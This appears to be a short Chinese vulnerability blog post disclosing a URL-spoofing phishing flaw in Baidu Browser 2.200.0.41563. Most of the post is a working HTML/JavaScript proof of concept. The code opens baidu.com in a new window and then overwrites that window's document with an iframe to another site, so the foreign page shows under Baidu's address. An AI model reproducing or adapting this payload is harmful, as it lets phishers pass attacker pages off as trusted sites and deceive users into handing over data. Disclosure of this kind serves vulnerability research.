百度浏览器2.200.0.41563伪造任意网站钓鱼欺诈漏洞

  • A+
所属分类:漏洞时代
摘要

百度浏览器伪造百度网站会不会很带喜感?无加载进度条,代码类似
[php]

百度浏览器伪造百度网站会不会很带喜感?无加载进度条,代码类似
<br /> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"</p><p>"http://www.w3.org/TR/html4/loose.dtd"></p><html> <head> <title>即将为你打开百度!~</title> <script type="text/javascript"> var wx; function invokePoC() { wx = open("http://www.baidu.com:81/","newwin"); doit(); } function doit() { wx.document.open(); wx.document.write("<ti"+"tle>GOOGLE</title><iframe src='http://0day5.com' width=95% height=95%>"); } invokePoC(); </script> </head> </html><p>
打开后自己跳转到0day5.com

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: